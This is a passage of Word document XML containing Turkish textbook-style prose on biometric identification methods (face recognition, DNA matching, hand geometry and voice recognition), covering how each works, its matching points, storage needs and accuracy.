          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> analizi, yüz hareketini veya değişken kamera açısını Eigenface yönteminden daha fazla affetmektir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diğer bir alternatif olan Sinir Ağı Haritalama sistemleri hem canlı görüntüyü hem de depolanan görüntüyü birbiriyle karşılaştırır ve bir eşleşme olup olmadığına dair bir “oylama” yapar. Algoritma, zor aydınlatma koşullarını </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>veya yüz özelliklerinin hareketini hesaba katarken işlem sırasında çeşitli özelliklere verdiği ağırlığı değiştirebilir. Son olarak, Otomatik Yüz İşleme, gözler, burnun ucu ve ağzın köşeleri gibi kolayca edinilen özellikler arasındaki mesafeleri kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eşleşme</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> noktaları. Kullanılan belirli eşleşme noktaları, kullanılan tarama metodolojisinin türüne bağlıdır. Neredeyse tüm yöntemler yüz özelliklerinin ölçümlerini, aralarındaki mesafenin bir fonksiyonu olarak veya “standartlaştırılmış” yüzlerle karşılaştırıldığında alır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720C62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. Şablon boyutu kullanılan yönteme göre değişir. Bire bir eşleştirme uygulamaları genellikle 1 ila 2 Kb ara</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lığında şablonlar kullanır. Bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00720C62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çok uygulamalar 100 bayt kadar küçük şablonları kullanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830985">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk. Yüz tarama teknolojisini pazarlayan birçok şirket, yüzde 98 ile 99 arasında yüksek doğruluk oranları talep ediyor. Bununla birlikte, yakın zamanda yapılan bir ABD Savunma Bakanlığı çalışması, çoğu sistemin sadece yüzde 50 ila 60'lık bir doğruluk oranına sahip olduğunu buldu. Buna rağmen, kullanım kolaylığı ve tarama cihazlarıyla doğrudan kullanıcı etkileşimi için ihtiyaç duyulmaması, yüz taramayı birçok uygulama için çekici bir yöntem haline getirmekted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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B64B41">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DNA Eşleştirme (DNA Matching) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B64B41">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Belki de hiçbir zaman bir biyometrik tür son zamanlarda DNA eşleşmesinden daha fazla baskı alamadı. Suç soruşturması, afet mağduru kimliği ve çocuk güvenliği gibi çok çeşitli uygulamaların </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tümü yardım için DNA eşleşmesine baktı</w:t>
      </w:r>
      <w:r w:rsidRPr="00B64B41">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Tüm canlı hücrelerde bulunan temel kalıtsal maddeye deoksiribonükleik asit veya DNA denir. Bu DNA, canlıların embriyonik gelişimi sırasında oluşur ve vücuttaki her hücreye kopyalanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD068B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nasıl çalışır. DNA moleküllerinin çoğunluğu tüm insanlar için aynıdır. Bununla birlikte, her bir insanın DNA molekülünün yaklaşık üç milyon çifti (baz çift olarak adlandırılır) kişiden kişiye değişir. DNA analizi yaparken, bilim adamları önce belirli bir örnekte bulunan DNA'yı izole ederler.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD068B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD068B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Daha sonra, DNA, VNTR olarak bilinen DNA'nın aynı tekrar dizilerini içeren kısa parçalara bölünür. Ardından fragmanlar boyuta göre sıralanır ve bir DNA eşleşmesini belirlemek için karşılaştırılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD068B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eşleşme</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD068B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> noktaları. VNTR fragmanları izole edildikten sonra istatistiksel analizden geçirilir. Örneğin, belirli bir uzunluğa sahip herhangi bir VNTR “konumu” için, bir popülasyonda bu uzunlukta eşleşen bir VNTR'ye sahip birçok kişi olabilir. Bununla birlikte, VNTR lokuslarının diğer numuneleriyle birleştirildiğinde, bütün bu numunelerin kombinasyonu, sadece bu kişi tarafından sahip olunan istatistiksel olarak benzersiz bir desen haline gelir. Gittikçe daha fazla yer kullanarak, ilgisiz iki kişinin eşleşen bir DNA profiline sahip olma olasılığı oldukça düşüktür (istatistiksel olarak).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96EC5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. DNA eşleştirme bilgisi, fiziksel biçimde (özel röntgen filmi kullanarak) veya özel bir veri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F96EC5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tabanı kullanılarak elektronik biçimde saklanabilir. Dünyadaki birçok hükümet, yüzbinlerce eşsiz DNA profili ile büyük DNA veri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F96EC5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tabanları geliştirmeye başlıyor. Her bir sistem DNA şablon bilgisini kendi formatında sakladığından, kesin boyutlandırma gerekliliklerini belirlemek zordur. Bununla birlikte, DNA şablonlarını kaydetmenin bir kişinin gerçek DNA'sını, popülerliğini artıran bir tıbbi uygulamayı depolamaktan farklı olduğunu unutmayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96EC5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Doğruluk. Dört VNTR lokusu bile kullanıldığında, DNA eşleşmesi olan iki kişi bulma olasılığı beş milyonda birdir. FBI analizi ortalama 13 lo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kus</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96EC5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanır ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eşleşme ihtimalini 100 milyarda 1’e </w:t>
      </w:r>
      <w:r w:rsidRPr="00F96EC5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>düşürür. Bu, DNA'yı biyometrik analizin en doğru formlarından biriyle eşleştirir. Bununla birlikte, karmaşıklığı nedeniyle, DNA analizi kesinlikle bir laboratuvar bilimidir. Henüz bir “tüketici pazarı” teknolojisi değil.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="TrumpMediaeval-Bold" w:hAnsi="TrumpMediaeval-Bold" w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004005C5">
        <w:rPr>
          <w:rFonts w:ascii="TrumpMediaeval-Bold" w:hAnsi="TrumpMediaeval-Bold" w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">El Geometrisi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TrumpMediaeval-Bold" w:hAnsi="TrumpMediaeval-Bold" w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Hand Geometry)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE07D2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>El geometrisi analizi işlemi, tanımlama ve kimlik doğrulama yapmak için elin özelliklerinin geometrik şeklini ve yapılandırmasını kullanır. Parmak izleri dışında, bireysel el özellikleri, pozitif tanımlama sağlamak için yeterince benzersiz bilgiye sahip değildir. Bununla birlikte, kombinasyon halinde alındığında birçok özellik biyometrik kullanımı mümkün kılmak için yeterli eşleşme noktaları sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE07D2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nasıl çalışır. Bir kullanıcı büyük bir metal yüzeye bir el, avuç içi aşağı yerleştirir. Bu yüzeyde, “kılavuz mandalları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE07D2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>guidance pegs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE07D2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” adı verilen beş kısa metal temas noktası bulunur. Kılavuz mandalları, kullanıcının daha fazla hassasiyet için elini metal yüzey üzerinde hizalamasına yardımcı olur. Cihaz, elin özelliklerini “okur” ve çeşitli eşleşme noktalarını kaydeder. Sisteme bağlı olarak, tarama iki boyutlu veya üç boyutlu görüntü alabilir. İzler, kirler ve tırnaklar gibi özellikler göz ardı edilebilir, çünkü bu “özellikler” bir insanın yaşamı boyunca hızlı bir şekilde değişir. Tipik el taramaları iki ila dört saniye sürer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A54E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eşleşme </w:t>
      </w:r>
      <w:r w:rsidRPr="004A54E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noktaları. El tarama sistemleri tipik olarak, uzunluk, genişlik, kalınlık, cilt saydamlığı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A54E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>parmaklar ve</w:t>
      </w:r>
      <w:r w:rsidRPr="004A54E3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> elin yüzey alanı da dahil olmak üzere 90 ila 100 bireysel el karakteristiği kaydeder. Bu özellikler, birbirleriyle olan ilişkinin yanı sıra (örneğin, uzaklık, bağıl boyut vb.) kaydedilir ve saklanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002432F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. El geometrisi şablonları, göreli olarak az bir miktarda, dokuz bayta kadar az bir depolama alanında saklanabilir. Bu, akıllı kartlar gibi bellek depolamasının üstün olduğu uygulamalar için idealdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231F4F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk. El geometrisi sistemlerinin doğruluğu oldukça yüksektir ve bu onu tarihsel olarak popüler bir biyometrik yöntem haline getirir. Aynı zamanda kullanıcılar arasında oldukça kabul edilebilir bir değeri vardır ve mevcut uygulamaların kullanımı kolaydır. Bununla birlikte, el geometrisi sistemleri tipik olarak kimlik doğrulama amaç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ları için kullanılır, çünkü bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00231F4F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çok tanımlama uyumu veri tabanının büyüklüğü arttıkça giderek daha zorlaşır. Ayrıca, ekipmanın mevcut ortamlara entegre edilmesi pahalı ve zor olabil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r w:rsidRPr="00F3793A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ses ve Konuşma Tanıma (Voice and Speech Recognition)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3793A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ses tabanlı biyometrilerin birkaç farklı çeşidi vardır. Bunlar, konuşmacının olumlu bir şekilde tanımlanması için kişinin konuşmasındaki kalıpların analiz edildiği konuşmacı doğrulamasını ve konuşmayı yapan kişiye bakılmaksızın konuşulan sözcükleri tanımlayan konuşmanın tanınmasını içerir. Konuşma tanıma sistemlerinde konuşmacı ile konuşma arasında doğrudan bir ilişki olmadığı için, tanımlama ya da doğrulama için yararlı değildir. Son olarak, sesli yazı sistemleri bir insan sesini kaydeder ve konuşmacının sesinde mevcut olan akustik bilginin bir analog veya dijital gösterimini oluşturur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3793A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nasıl çalışır. Bir kullanıcı, bir mikrofonun veya telefon alıcısının yanına yerleştirilir, böylece sesi yakalanabilir ve analiz edilebilir. Kullanıcının birkaç senaryodan birine göre bir cümle okuması istenir:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86F1D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metne bağlı sistemler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86F1D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Text-dependent systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86F1D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, kullanıcının belirli bir önceden tanımlanmış sözcük veya kelime öbeği dizisini okumasını gerektirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
